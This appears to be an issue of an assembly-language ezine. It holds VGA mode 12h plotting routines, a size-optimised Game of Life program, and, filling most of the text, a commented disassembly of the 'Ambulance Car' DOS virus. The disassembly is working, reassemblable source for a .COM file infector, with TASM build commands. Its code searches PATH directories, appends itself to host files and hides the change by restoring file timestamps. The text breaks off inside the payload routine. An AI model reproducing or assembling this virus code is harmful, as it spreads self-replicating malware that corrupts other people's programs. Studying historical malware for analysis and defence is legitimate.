------------------ VgaPlot -------------------- Start --------------
VgaPlot: mov al, [es:bx] ; Do the actual plotting
mov al, [ToPlot]
mov [es:bx], al
ret
------------------ VgaPlot --------------------- End ---------------
The first line is a read command. It notifies the VGA controller about the
address of the pixelbyte. The resulting data from the read is of no concern.
We immediately replace it with the value of "ToPlot". For plotting there is a
value of "FF" in this byte and for erasing there is a "00" in it.
After this comes the actual plotting function. The write to the specified
address sets the pixels as defined by AL and SetMask.
Adding it all up gives the following code to really plot a pixel:
-------- PlotPix ------------------------------- Start -----------
PlotPix: push ax, bx, cx, es ; plot a point on screen
call VGaddr
mov cx, [di.CurrX] ; calculate plottingmask
add cx, [di.Win_X]
and cx, 0111xB ; cl = position in byte
mov ah, 080
shr ah, cl ; now move the high bit backwards...
call SetMask ; use it to set mask
call VgaPlot ; and do the plotting
pop es, cx, bx, ax
ret
-------- PlotPix -------------------------------- End ------------
That's it to plot a pixel: just a few calls to some procedures we defined
earlier on. The msjority of this procedure is comprised of the way to find the
actual bit-position in the VGA memory byte. Remember, to plot pixel 0 we need
bit 7!
Therefore we load CX with the current X value, correct this for the current
window position and isolate the lower 3 bits. These indicate the position of
the pixel in screenmemory.
mov cx, [di.CurrX] ; calculate plottingmask
add cx, [di.Win_X]
and cx, 0111xB ; cl = position in byte
At this point, CL contains the n-th bit in this byte. So I load AH with the
binary pattern 10000000 and shift it right until the corresponding bit
position is reached:
mov ah, 080
shr ah, cl ; now move the high bit backwards...
I don't know if there are batches of Intel CPU's that have a problem with the
SHR instruction is CL equals zero, but I have not yet noticed any.
Lines: series of pixels.
------------------------
There are three kinds of lines: horizontal, vertical and sloped ones. Vertical
lines are plotted pixel by pixel since all of them end up in different bytes
of VGA memory. Sloped lines are best taken care of by a Bresenham-style line
drawing algorithm (although the digital differential analyser is better).
Horizontal lines are a different kind of line. In these, several adjacent
pixels are plotted. And adjacent pixels mainly are in the same VGA memory
byte. Therefore I made two horizontal line drawers. The one for short lines
(less than 17 pixels) just plots the pixels one by one.
The other algorithm, for lines of 17 pixels or more, tries to fill VGA memory
with as much byte writes as possible.
Taking care of longer horizontal lines.
---------------------------------------
Suppose our line is composed as follows:
First 1 2 3 ... K Last ; byte in video memory
......## ######## ######## ###...### ###..... ; # = pixel to be set
So our line starts at pixel 6 (i.e. bit 1) of VGA memory byte "First". Next it
lasts for N pixels and the last pixel to plot is pixel 2 (or bit 5).
We need some variables to calculate how to proceed with this in the shortest
possible time. This needs some calculations, so for short lines the math
overhead is more work than the actual plotting will take up.
First 1 2 3 ... K Last ; byte in video memory
......## ######## ######## ###...### ###..... ; # = pixel to be set
We first need to know the E-value which describes the number of pixels to plot
in the very first byte. The E-value is calculated as follows:
E-val = 8 - ((CurrX + Win_X) AND 7)
Now we know the number of pixels to plot in the very first VGA memory
location. It would however come in handy if we would know with which plotting
mask this would correspond. That's why we use it to derive the E-mask:
E-mask = FF shr ((8 - E-val) AND 7)
Next we need to know how many pixels there need to be plotted in the last
memory location. L-value and L-mask are determined as follows:
L-val = (Total - E-val) AND 7
L-mask = 080 sar L-val
With the SAR we shift signbits to the right until the number of pixels
corresponds with the number of bits in the mask.
The last parameter we need to know is the actual speeding-up part: the full
bytes that can be plotted. The octet-part of the routine. We do this as
follows:
K-val = (T - E-val - L-val)/8
Now it also becomes clear why I kept the E-val and L-val parameters. They're
just needed for getting the right value for K-val.
There is, however one exceptional situation. Suppose the line we need to plot
is 26 pixels long, starting at pixel 6. This would produce the values:
E-val = 2 E-mask = 00000011
L-val = (26 - 2) AND 7 = 24 AND 7 = 0 L-mask = 00000000
K-val = (26 - 2 - 0)/8 = 3
So, if the line ends on a byte boundary, we may NOT try to plot <A LOT> of
pixels past it (in a plotting loop that starts with CX = 0).
What the H_line procedure does is no more than what I decribed above. Here
comes the source:
-------- H_Line -------------------------------- Start -----------
L0: mov cx, [di.DeltaX] ; do a short line
L1: call PlotPix ; by just repeating a single pixel-
inc [di.CurrX] ; plot and update of CurrX
loop L1 ; until done
pop es, cx, bx, ax
ret
H_Line: push ax, bx, cx, es ; optimized horizontal line drawing
cmp [di.DeltaX], 17 ; too few pixels for a bulk draw?
jb L0
mov cx, [di.CurrX] ; do a long line
add cx, [di.Win_X] ; first get the E-value as described
and cx, 0111xB ; above
mov bx, 8
sub bx, cx
mov [E_val], bx ; pixels to plot in leftmost byte
mov al, 0FF ; now compose the mask to use there
shr al, cl
mov [E_mask], al ; and store it in memory
mov cx, [di.DeltaX] ; CX = length of line
sub cx, [E_val] ; compensate for first-byte pixels
mov ax, cx
and ax, 0111xB ; this many pixels in rigthmost byte
mov [L_val], ax ; and store it in memory
sub cx, ax ; CX = number of pixels inbetween
shr cx, 3 ; divide by 8 pixels per byte
mov [K_val], cx ; number of "full" bytes to plot
clr al ; AL := 0
mov cx, [L_val] ; prepare to compose L-mask
cmp cx, 0 ; any bits in "last byte"
IF ne mov al, bit 7 ; if any bits, setup AH register
dec cx ; compensate for pixel 0, ...
sar al, cl ; ... compose plotting mask and ...
mov [L_mask], al ; ... store it into memory.
; that's it. Let's plot!
call VGaddr ; load BX with address of byte in
; VGA memory
mov ah, [E_mask]
call SetMask ; set plotting mask and ...
call VgaPlot ; ... plot leftmost part
inc bx ; get adjacent address
mov cx, [K_val] ; prepare for bulk-filling
jcxz >L4 ; if nothing to do, jump out
mov ah, 0FF ; else set ALL PIXELS mask
call SetMask
L3: call VgaPlot ; plot middle part
inc bx
loop L3 ; until done
L4: mov ah, [L_mask]
call SetMask
call VgaPlot ; plot remaining pixels
mov ax, [di.DeltaX]
add [di.CurrX], ax ; make sure CurrX is updated
pop es, cx, bx, ax ; and git outa'here
ret
-------- H_Line --------------------------------- End ------------
The preparations are the bulk of the work, but after that is done, the line is
plotted with the lowest amount of I/O overhead.
Vertical lines.
---------------
Vertical lines are simply plot by repeatedly calling PlotPix. It's so simple
that neither need nor want to elaborate on it:
-------- VertLin ------------------------------- Start -----------
VertLin: push cx ; draw a vertical line
mov cx, [di.DeltaY]
L0: call PlotPix
inc [di.CurrY] ; adjust Y coordinate
loop L0 ; but not X value!
pop cx
ret
-------- VertLin -------------------------------- End ------------
What to do with linedrawing functions?
--------------------------------------
Now that we can draw lines, we can also draw boxes and window borders. This
all looks very professional and the overview of a program is enhanced
considerably. Try to figure out how to make the box-drawers by yourself.
Plotting text.
--------------
Now that we have windows that can be put at any plotting position, we also
need to be able to position text at any position. It doesn't look nice if
different windows force text to default to byte boundaries. And with the
experience we got from the H_line function, we are able to make a character
plotter that puts text on screen at ANY position.
I use a 9 x 16 character set. The nineth bit is just always blank, but it
enhances readability considerably. The pixels in the bitmap are all 8 bits
wide and 16 pixels tall.
In exceptional cases, the bitmaps can be plotted at byte boundaries. In 85+ %
of the time this will not be the case. Therefore I do the following:
- do some positioning math first
- repeat 16 times:
- load the byte of the bitmap in AH
- shift AX to the right the correct number of pixels
- plot the AH part
- if plotting on a byte boundary, we're done, else
- repeat 16 times:
- load the byte of the bitmap in AH
- shift AX to the right the correct number of pixels
- plot the AL part
Let's just have a look:
-------- PutChar ------------------------------- Start -----------
L0: add [di.CurrY], 16 ; process 'LF'
L1: pop es, si, cx, bx
ret
L2: mov bx, [di.Indent] ; process 'CR'
mov [di.CurrX], bx
jmp L1
PutChar: push bx, cx, si, es ; print char in al at (x,y)
cmp al, lf
je L0
cmp al, cr
je L2
mov bx, [di.CurrX]
add bx, CHR_WID
cmp bx, [di.Win_wid] ; still safe to print character?
jbe >L3 ; if so, skip over this part
mov bx, [di.Indent]
mov [di.CurrX], bx ; mimick 'CR'
add [di.CurrY], 16 ; mimick 'LF'
L3: mov cx, [di.CurrX]
add cx, [di.Win_X]
and cx, 0111xB
mov [C_val], cl ; store shiftcount for masks
mov bx, 0FF00
shr bx, cl ; setup plotting mask and ...
mov [P_mask], bx ; ... store it
clr ah ; ax = ASCII code
mov si, ax ; make address of pixels in bitmap
shl si, 4
add si, offset bitmap
call VGaddr ; bx = -> in video memory
mov ax, [P_mask] ; only the AH part is used ...
call SetMask ; ... here.
mov cx, 16 ; 16 pixel lines per token
L4: push cx ; we're in the loop now
mov ah, [si] ; AH = pixelpattern
clr al ; AL = empty
mov cl, [C_val] ; get shiftcount
shr ax, cl ; distribute pixelBYTE across a WORD
mov cl, [es:bx] ; dummy read, CL is expendable
mov [es:bx], ah ; actual plotting of this half
add bx, 80 ; point to next pixelbyte address
inc si ; next pixeldata address
pop cx
loop L4 ; and loop back
sub bx, 16 * 80 - 1 ; back to original position
mov ax, [P_mask]
cmp al, 0 ; if nothing to do, ...
je >L6 ; ... skip this chapter
mov ah, al ; else repeat the lot for the right-
call SetMask ; most pixels....
mov cx, 16
sub si, cx ; correct SI
L5: push cx
mov ah, [si]
clr al
mov cl, [C_val]
shr ax, cl
mov cl, [es:bx]
mov [es:bx], al
add bx, 80
inc si
pop cx
loop L5
L6: add [di.CurrX], CHR_WID ; adjust CurrX value before ...
jmp L1 ; ... getting a hike
-------- PutChar -------------------------------- End ------------
So far for plotting text. This routine will dump any character in any place of
the graphics screen. But it needs a CurrX and a CurrY value to know where to
plot things. This is both an advantage and a disadvantage. The advantage is
that we can plot ANYWHERE we like. The disadvantage is that we need to
elaborately specify CurrX and CurrY before the text is where we would like to
have it.
That's why I made the constrcut with the Topic and TopicEnd macro's, as
described above.
Here comes the code for printing a table on screen. We spent a lot of time on
the preparations, and this is the stage where it is going to pay off. Look how
much code we need for printing neat sets of tokens and characters on screen.
-------- Print --------------------------------- Start -----------
print: mov ah, [di.TxtCol] ; print a table of text
call SetColr
L0: lodsw ; get Xpos
cmp ax, 0F000 ; end of table?
je ret ; exit, if so
mov [di.CurrX], ax
lodsw ; get Ypos
mov [di.CurrY], ax
L1: lodsb ; get text
cmp al, 0
je L0
call putchar ; and print it
jmp L1 ; until this line is done
-------- Print ---------------------------------- End ------------
Wit this approach, and starting from a working (empty) framework of routines,
you can design the userinterface of your software within the hour. And it will
look just fine.
The actual code is then the only thing you need to worry about.....
Having such routines, which have been tested and found reliable, you make the
user interface easily and are able to concentrate on the actual coding the
maximum amount of time. If the screen needs another layout (since you couldn't
realize the function you considered), just change a few entries in the table.
Many times just the X or Y values need some adjustment for better lining up,
or for regrouping. No need to worry about the order of the plotting. Just make
sure that the correct window is selected (for the colours) and that the table
is terminated by a TopicEnd.
Conclusion.
-----------
So far my elaboration on the VGA mode 12h. Again, I would rather use 800 x 600
but that mode is not standardised. VGA 12h is standard on all VGA cards, so
it's the best we can universally get and for many applications it is more than
enough.
Please try to make the BoxDrawing function. I will submit the "solution" to
the next issue. For future issues I will start working on an explanation about
mouse-usage. This little rodent is nice to control many applications. If the
screen is well layed out, you don't need the keyboard for data entry. Just drag
the mouse along the screen and poke him in the eye.
The bitmap data for the character generator can be obtained from
http://asmjournal.freeservers.com/supplements/univ-vmode.html
where the complete text of the article has been archived.
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
Conway's Game of Life
by Laura Fairhead
I had the idea for this one day after stumbling upon a "gem" that
somebody had written to play life. It was small and fast and reminded
me of years ago when I had written many versions of this for the
BBC Master 128 (my love lost). Since I had never written a version
for the PC I thought that I would, and ended up spending some hours
trimming off the bytes until it is now :- 156 bytes long. I must admit
if it was not for the program that I found, this program would have been
MUCH slower than it is. After I had written the code I tested it against
the program that I had found and to my perplexity it was a great deal
slower. After some hours of frustration I found the reason:- my program
was accessing the video memory to do the bulk of its work. This must have
brought about a factor of 12 decrease in speed!!
Life is a classic game of cellular automata by John Conway. It is
played on an nxn grid of squares. Each square may be occuppied by a
cell or empty. Each 'go' of the game the player calculates the next
generation of a colony of cells by applying three simple rules:-
(i) a cell with less than 2 or more than 3 neighbours dies
(ii) a cell with 2 or 3 neighbours survives
(iii) a cell is born in a square with exactly 3 neighbours
A neighbouring square is one diagonally adjacent as well as the
normal horizontal/vertical so each square has 8 neighbouring squares.
Overview of the code
~~~~~~~~~~~~~~~~~~~~
First, note that if we define
S:=state of square in this generation (0=empty, 1=occupied)
N:=number of neighbours
S':=state of square in the next generation
then according to the rules
S'={0, if N<2 or N>3
{1, if (N=2 or N=3) and S=1
{1, if N=3
so S'=1 iff (N=2 and S=1) or N=3
this can be simplified using bitwise-OR to the dramatically simple:
S'= ( N|S=3 )
note: iff means "if and only if"
"A iff B" means that A => B and B => A
The code uses one big array with one byte for each square that
starts just after the program end. To save space it just assumes that it
can use this memory since this is generally okay. However this is
very bad practice really and it should use AH=04Ah/int 021h to adjust
the memory size and abort if not successful.
The big array actually serves the purpose of 2 arrays; bit0 of
a byte indicates the state of the square in the current generation. bit4
of each byte indicates the state of the square in the next generation.
After initialisation, generation 0 is calculated by filling about
1/4 of the array with 1's.
Now we do a loop to get the next generation. The screen is 0140h
bytes across and 0C8h bytes down. Therefore:-
-0141h -0140h -013Fh
-0001h . +0001h
+013Fh +0140h +0141h
If DI is the offset of the array which we are calculating for,
note that the neighbours can be summed as follows:-
MOV AX,[DI-0141h]
ADD AL,[DI-013Fh]
ADD AX,[DI+013Fh]
ADD AL,[DI+0141h]
ADD AL,[DI-1]
ADD AL,[DI+1]
ADD AL,AH
Note that if bit4 of any of the neighbours was set then we would
still have the correct total in the least significant 4 bits of AL.
So from here the new cell state can be calculated simply:-
OR AL,[DI]
AND AL,0Fh
CMP AL,3
And if ZF=1 now we have a set cell.
JNZ ko
OR BYTE PTR [DI],010h
ko:
When the next generation has been calculated we have done most of
the work. The only thing is that if we want to iterate we need all
of those bit4 's moved to bit0, also we want to display the next
generation, this can be done easily at the same time.
Note that due to the structure of the code generation#0 is never
displayed. Also we always have blue cells. Despite this it is quite
an entertaining little program to watch....
The source here is in MASM format but should be trivial to convert
to run on any assembler. It is assembled into a .COM file which means
you should use the /T option on the linker (T=tiny).
===========START OF CODE===================================================
OPTION SEGMENT:USE16
.386
cseg SEGMENT BYTE
ASSUME NOTHING
ORG 0100h
kode PROC NEAR
;
;mode 013h=320x200x256 (0140hx0C8h) and be kind with the stack
;
MOV SP,0100h
MOV AX,013h
INT 010h
;
;use current time as random number seed
;in BP,DX which is used later
;
MOV AH,02Ch
INT 021h
MOV BP,CX
;
;get seg address of 1st seg after code for array store start
;for now ES points there and DS=screen
;
MOV AX,DS
ADD AX,01Ah ;(OFFSET endofprog+0Fh>>4)=(1A)
MOV ES,AX
MOV AX,0A000h
MOV DS,AX
;
;CREATE GENERATION#0
; this is done by filling approx 1/4 of the cells in the array
; 'randomly', while taking care not to fill any edge cells
;
;
;blank the array
; this is done to ensure the edge cells are clear
;
XOR DI,DI
MOV CX,0FA00h
REP STOSB
;
;fill the array
; two nested loops, CL counts the rows, SI counts the columns
; this is so that after each row DI can be bumped past the edge
;
MOV CL,0C6h
MOV DI,0141h ;array offset we are addressing
;
;BX is 0141h from now until exit, it is used as a constant later
;
MOV BX,DI
lopr0: MOV SI,-013Eh
;
;iterate random number seed in BP,DX
;
lopr: LEA AX,[BP+DI]
ROR BP,3
XOR BP,DX
SUB DX,AX
;
;set cell with probability 1/4
;
CMP AL,0C0h
SBB AL,AL
INC AX
STOSB
;
;
INC SI
JNZ lopr
SCASW ;DI+=2, skipping edge
LOOP lopr0
;
;now we set DS=array, ES=screen. this doesn't change until exit
;
PUSH ES
PUSH DS
POP ES
POP DS ;DS=vseg,ES=0A000h throughout
;
;'mlop' is the main loop, outputting generations until the user terminates
;
mlop:
;
;CREATE NEXT GENERATION
;
MOV DI,BX ;DI=0141h
;
;'lopy' is the loop for rows, a count is not needed because we can get
;the stop point from testing the array offset DI
;
lopy: MOV SI,013Eh
;
;'lopx' is the loop for columns, SI holds the count
;
;
;get the total number of neighbours into the least significant 4 bits of AL
;
lopx: MOV AX,[DI-0141h]
ADD AL,[DI-013Fh]
ADD AX,[DI+BX-2]
ADD AL,[DI+BX]
ADD AL,[DI-1]
ADD AL,[DI+1]
ADD AL,AH
;
;calculate new cell state
;
OR AL,[DI]
AND AL,0Fh
CMP AL,3
JNZ SHORT ko
OR BYTE PTR [DI],010h
ko: INC DI
DEC SI
JNZ lopx
;
;(each row we miss 2 edge cells)
;
SCASW
CMP DI,0FA00h-013Fh
JC lopy
;
;FIXUP ARRAY AND DISPLAY
; bit4 is copied to bit0 in each byte. all other bits then cleared so
; cells appear as blue pixels, also the iteration loop above assumes
; that bit4 is clear on entry (it only sets it)
;
MOV CX,03E80h
XOR DI,DI
lopc: LODSD
SHR EAX,4
AND EAX,01010101h
MOV [SI-4],EAX
STOSD
LOOP lopc
;
;USER KEYPRESS?
;
MOV AH,0Bh
INT 021h
ADD AL,3
;
;no, back for next generation
;
JP mlop
;
;yes, AL=2 now so make AX=2 to go into text mode
;
CBW
INT 010h
;
;back to DOS
;
MOV AH,04Ch
INT 021h
kode ENDP
endof EQU $
cseg ENDS
END FAR PTR kode
===========END OF CODE=====================================================
While the code is optimised for size and for speed you may find that
it runs too quickly. This can be easily remidied by the addition of a wait
for vertical synchronisation loop (or vert sync as we techies call it).
Just add the following after the generation calculating code (that
is after the instruction 'JC lopy'):-
MOV DX,03DAh
lopv0: IN AL,DX
AND AL,8
JNZ lopv0
lopv1: IN AL,DX
AND AL,8
JZ lopv1
Also if you add this the program size has changed. 'endofprog' is now
01ABh, so the number of segments to add to DS to get the start of free space
is now 01Bh. You must change the instruction at the beginning of the code:-
MOV AX,DS
** ADD AX,01Bh ;(OFFSET endofprog+0Fh>>4)=(1B) **
MOV ES,AX
One final note: I use SCASW in this code to increment DI by two.
This is a well known space saving trick. However you must be wary since
it does not do just that; it reads the memory at ES:[DI]. Generally this
is fine but if DI=0FFFFh we will get a general protection fault.
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
'Ambulance Car' Disassembly
by Chili
This virus has definitely my favourite payload of all times. I just love
seeing that little ambulance run across the screen with a 'siren' playing at
the same time. Other than that, the virus itself isn't much of a thing. Don't
forget though, that it is dated back to at least 1990.
It is a non-resident .COM infector, and each time an infected file is run it
will attempt to infect two files (be it in the current directory or in a
directory located in the PATH) in a parasitic manner. Infected files will
experience a 796 bytes growth, being the main virus body appended to the end of
the host. Also the host file's date and time will be preserved. On ocasion the
virus will display the 'ambulance car' payload.
The virus doesn't preserve the initial contents of AX and so programs like
HotDIR fail to run when infected. Also if there is any reference to 'PATH' in
the environment block before the actual PATH string the virus will assume that
to be the actual PATH (i.e. 'CLASSPATH=...').
Playing it safe
---------------
At the DOS prompt type "PATH ;" so that the virus will only infect files in the
current directory and you can keep track of things. Also if all you want to do
is see the payload, then comment the following lines in the source code (right
after the delta offset calculation) so that no files are infected:
call search_n_infect
call search_n_infect
Moreover you should comment the lines presented below (for the 'RedXAny' strain
look-alike) so that the payload is shown everytime the virus is run.
In case things start to get out of hand, you should do one of three things:
either disinfect the files yourself with an hex editor, use the latest version
of F-PROT (available from ftp.complex.is or through Simtel and Garbo) to scan
and clean the infected files or use my own disinfector (in another article) to
clean this specific strain.
[NOTE: F-PROT will report the strain whose source code is presented as
Ambulance.796.D]
Keep in mind that this virus is not destructive, so feel free to go ahead and
infect your entire computer (you really shouldn't do this, since accidents can
sometimes happen!).
Strains
-------
A 'RedXAny' strain look-alike can be obatined by commenting the following
lines (both in the 'payload' procedure):
jne exit_payload ; (starting with the sixth)
jnz exit_payload ; don't show payload
[NOTE: This will not give you the actual 'RedXAny' strain, but one that behaves
in the same manner - always shows the ambulance car]
Other strains exist, but will not be discussed here, has nothing of interest
would be added.
Compatibility
-------------
The virus runs ok in a Win95's DOS box. Also, remember that for the payload to
be apreciated in full, a PC Speaker is required. Bad luck for those of you who
don't have a computer with one...
Here is the disassembly:
--8<---------------------------------------------------------------------------
; Ambulance Car (aka Ambulance, RedX, Red Cross)
; Ambulance-B strain (or so it seems!)
; Disassembly by Chili for APJ #6
; Byte for byte match when assembled with TASM 4.1
; Assemble with:
; tasm /ml /m2 ambul-b.asm
; tlink /t ambul-b.obj
PSP_environment_seg equ 2Ch ; PSP location of process' environment
; block segment address
BDA_addr equ 40h ; BDA (Bios Data Area) segment address
BDA_LPT3_port_addr equ 0Ch ; BDA location of LPT3 I/O port base
; address
BDA_video_mode equ 49h ; BDA location of current video mode
BDA_timer_counter equ 6Ch ; BDA location of number of timer ticks
; (18.2 per second) since midnight
_TEXT segment word public 'code'
assume cs:_TEXT, ds:_TEXT, es:_TEXT, ss:_TEXT
org 100h
; Host and virus' main body
;--------------------------
ambulance_car proc far
; Jump over host to real beginning of virus
db 0E9h, 01h, 00h ; Harcoded relative near jump
; Host (missing the first 3 bytes)
;
; Dummy host is just 4 bytes so only a 'nop' here
host:
nop
; Calculate the delta offset
;
; This piece of code will 'fool' some disassemblers and so it will appear as:
;
; call $+4
; add [bp-7Fh], bx
; out dx, al
; add ax, [bx+di]
;
; Pretty basic, but could turn out to be somewhat annoying if used all over the
; place (for the person doing the disassembly, that is!)
;
; (because of 'db 01h'; used since the near jump above is also 3 bytes long
; and that has to be taken into account for the displacement calculation)
real_start:
call find_displacement
db 01h ; Used to make this add up to 3 bytes
find_displacement:
pop si
sub si, offset host
; Infect twice then load up the payload
call search_n_infect
call search_n_infect
call payload
; Restore host's original first 3 bytes
lea bx, [si+original_3bytes-4]
mov di, offset ambulance_car
mov al, [bx]
mov [di], al ; Restore 1st byte
mov ax, [bx+1]
mov [di+1], ax ; Restore 2nd and 3rd bytes
; Return control to host
jmp di
; Move on to next step (be it 'search_n_infect' or 'payload')
next_step:
retn
ambulance_car endp
; Search for a file and infect it
;--------------------------------
search_n_infect proc near
; Search for the file
call search
; Found any file?
mov al, byte ptr [si+file_mask-4]
or al, al ; If not, then move on to the
jz next_step ; next step
; Increase 'opened files' counter
lea bx, [si+counter-4]
inc word ptr [bx]
; Open file in read/write mode (AL - 02h)
lea dx, [si+filename-4] ; Open a File
mov ax, 3D02h ; [on entry AL - Open mode;
int 21h ; DS:DX - Pointer to filename
; (ASCIIZ string)]
; [returns AX - File handle]
; Save file handle
mov word ptr [si+file_handle-4], ax
; Read file's first 3 bytes
mov bx, word ptr [si+file_handle-4]
mov cx, 3 ; Read from File or Device,
lea dx, [si+first_3bytes-4] ; Using a Handle
mov ah, 3Fh ; [on entry BX - File handle;
int 21h ; CX - Number of bytes to
; read; DS:DX - Address of
; buffer]
; Check if already infected
mov al, byte ptr [si+first_3bytes-4]
cmp al, 0E9h ; Is first byte a near jump?
jne infect ; If not, assume virus isn't
; here, so go ahead and infect
; Move file pointer to real virus start (pointed to by the initial near jump)
mov dx, word ptr [si+first_3bytes+1-4]
mov bx, word ptr [si+file_handle-4]
add dx, 3 ; Add 3 bytes to account for
; the near jump
xor cx, cx ; Move File Pointer (LSEEK)
mov ax, 4200h ; [on entry BX - File handle;
int 21h ; CX:DX - Offset, in bytes;
; AL - Mode code ( Move
; pointer CX:DX bytes from
; beginning of file, AL - 0)]
; Read first 6 bytes from that location
mov bx, word ptr [si+file_handle-4]
mov cx, 6
lea dx, [si+six_bytes-4]
mov ah, 3Fh ; Read from File or Device,
int 21h ; Using a Handle
; Double-check if already infected
;
; Compares the bytes read with the first part of the displacement calculation
; code
mov ax, word ptr [si+six_bytes-4]
mov bx, word ptr [si+six_bytes+2-4]
mov cx, word ptr [si+six_bytes+4-4]
cmp ax, word ptr [si+ambulance_car]
jne infect
cmp bx, word ptr [si+ambulance_car+2]
jne infect
cmp cx, word ptr [si+ambulance_car+4]
je close_file ; If already infected, then go
; ahead and close the file
infect:
; Reset file pointer to end of file (AL - 2)
mov bx, word ptr [si+file_handle-4]
xor cx, cx
xor dx, dx ; Move File Pointer (LSEEK)
mov ax, 4202h ; [returns DX:AX - New pointer
int 21h ; location]
; Calculate virus' near jump relative offset
sub ax, 3 ; Account for the near jump
mov word ptr [si+relative_offset-4], ax
; Get and save file's date and time (AL - 0)
mov bx, word ptr [si+file_handle-4]
mov ax, 5700h ; Get a File's Date and Time
int 21h ; [on entry BX - File handle]
push cx ; [returns CX - Time; DX -
push dx ; Date]
; Write virus body to end of file
mov bx, word ptr [si+file_handle-4]
mov cx, virus_body - real_start
lea dx, [si+ambulance_car] ; Write to a File or Device,
mov ah, 40h ; Using a Handle
int 21h ; [on entry BX - File handle;
; CX - Number of bytes to
; write; DS:DX - Address of
; buffer]
; Write host's first 3 bytes to after virus body
mov bx, word ptr [si+file_handle-4]
mov cx, 3
lea dx, [si+first_3bytes-4]
mov ah, 40h ; Write to a File or Device,
int 21h ; Using a Handle
; Move file pointer to beginning of file
mov bx, word ptr [si+file_handle-4]
xor cx, cx
xor dx, dx
mov ax, 4200h ; Move File Pointer (LSEEK)
int 21h
; Write jump-to-virus-body code to beginning of file
mov bx, word ptr [si+file_handle-4]
mov cx, 3
lea dx, [si+jump_code-4]
mov ah, 40h ; Write to a File or Device,
int 21h ; Using a Handle
; Reset file's date and time to previous (AL - 1)
pop dx
pop cx
mov bx, word ptr [si+file_handle-4]
mov ax, 5701h ; Set a File's Date and Time
int 21h ; [on entry BX - File handle;
; CX - Time; DX - Date]
close_file:
mov bx, word ptr [si+file_handle-4]
mov ah, 3Eh ; Close a File Handle
int 21h ; [on entry BX - File handle]
retn
search_n_infect endp
; Find a file to infect, in the PATH or in the current directory
;---------------------------------------------------------------
search proc near
mov ax, ds:PSP_environment_seg
mov es, ax
push ds
mov ax, BDA_addr
mov ds, ax
mov bp, ds:BDA_timer_counter
pop ds
; Where to infect
;
; Probability of infecting in the current directory (none of the first two
; lower bits of BP being set) is 1/4 (25%), while probability of searching in
; the PATH for a directory where to infect (one or both of the first two lower
; bits of BP being set) is 3/4 (75%)
test bp, 00000011b ; Check if we are to infect in
jz check_cur_dir ; the current directory or in
; a PATH directory
; Find the PATH string in the environment block
;
; Format of environment block (from Ralph Brown's Interrupt List):
;
; Offset Size Description
; ------ ---- -----------
; 00h N BYTEs first environment variable, ASCIIZ string of form "var=value"
; N BYTEs second environment variable, ASCIIZ string
; ...
; N BYTEs last environment variable, ASCIIZ string of form "var=value"
; BYTE 00h
;---DOS 3.0+ ---
; WORD number of strings following environment (normally 1)
; N BYTEs ASCIIZ full pathname of program owning this environment
; (other strings may follow)
xor bx, bx ; Point to the first character
check_if_PATH:
mov ax, es:[bx]
cmp ax, 'AP'
jne not_PATH
cmp word ptr es:[bx+2], 'HT'
je PATH_found
not_PATH:
inc bx
or ax, ax ; Check if both AH and AL are
jnz check_if_PATH ; equal to zero (meaning the
; standard environment block
; is over)
; Setup to check in the current directory
check_cur_dir:
lea di, [si+file_mask-4] ; Point to file mask holder
jmp short find_file
; Find a directory in the PATH
PATH_found:
add bx, 5 ; Point to after 'PATH='
find_dir:
lea di, [si+pathname-4] ; Point to PATH name holder
get_character:
mov al, es:[bx]
inc bx
or al, al ; Are we at the end of this
jz patch_dir ; PATH string?
cmp al, ';' ; Is this a PATH directory
je check_if_this_one ; separator?
mov [di], al ; Write this character to the
inc di ; PATH name holder
jmp short get_character
check_if_this_one:
cmp byte ptr es:[bx], 0 ; Are we at the end of this
je patch_dir ; PATH string?
shr bp, 1 ; Get rid of the first two
shr bp, 1 ; lower bits, because it's
; already known that at least
; one them is set
; Which directory to choose
;
; Probability of infecting in the found directory (none of the first two
; lower bits of BP being set) is 1/4 (25%), while probability of searching in
; the PATH for another directory where to infect (one or both of the first two
; lower bits of BP being set) is 3/4 (75%)
test bp, 00000011b ; Check if we are to search for
jnz find_dir ; files in this directory or
; not
patch_dir:
cmp byte ptr [di-1], '\' ; Does the directory already
je find_file ; have an ending '\'?
mov byte ptr [di], '\' ; If not, then add one
inc di
; Find a file to infect
find_file:
push ds
pop es
mov [si+filename_ptr-4], di ; Save current location within
; the pathname/file_mask
mov ax, '.*' ; Set file mask
stosw
mov ax, 'OC'
stosw
mov ax, 'M'
stosw
push es
mov ah, 2Fh ; Get Disk Transfer Address
int 21h ; (DTA)
; [returns ES:BX - Address of
; current DTA]
mov ax, es
mov word ptr [si+DTA_seg-4], ax ; Save DTA segment
mov word ptr [si+DTA_off-4], bx ; Save DTA offset
pop es
lea dx, [si+new_DTA-4] ; Setup new DTA
mov ah, 1Ah ; Set Disk Transfer Address
int 21h ; [on entry DS:DX - Address of
; DTA]
lea dx, [si+file_mask-4] ; Setup file mask (with or
; without a PATH directory)
xor cx, cx ; Search for normal files only
mov ah, 4Eh ; Find First Matching File
int 21h ; [on entry CX - File
; attribute; DS:DX - pointer
; to filespec (ASCIIZ string)
jnc file_found ; File found? (and no errors?)
; If no file found, then clear the file mask
xor ax, ax
mov word ptr [si+file_mask-4], ax
jmp short restore_DTA
; Check if we are to infect this file or find another one
;
; Probability of keeping the found file is 1/8 (12.5%) while probability of
; searching for another one is 7/8 (87.5%)
file_found:
push ds
mov ax, BDA_addr
mov ds, ax
ror bp, 1
xor bp, ds:BDA_timer_counter
pop ds
test bp, 00000111b
jz file_picked ; Keep this file?
; If not, then...
mov ah, 4Fh ; Find Next Matching File
int 21h
jnc file_found ; File found? (and no errors?)
; Either a file was picked or no more files where found (so keep last one)
file_picked:
mov di, [si+filename_ptr-4] ; Point to after path, if any
lea bx, [si+f_name-4]
; Copy the file name of the found file to our filename/pathname holder
store_filename:
mov al, [bx]
inc bx
stosb
or al, al ; Is the file name over?
jnz store_filename ; If not, then copy the next
; character
restore_DTA:
mov bx, word ptr [si+DTA_off-4] ; Get old DTA offset
mov ax, word ptr [si+DTA_seg-4] ; Get old DTA segment
push ds
mov ds, ax
mov ah, 1Ah ; Set Disk Transfer Address
int 21h
pop ds
retn
search endp
; Check if payload will be shown or not
;--------------------------------------
payload proc near
; Check if payload will be shown
;
; The payload will be shown only when the counter-of-opened-files matches
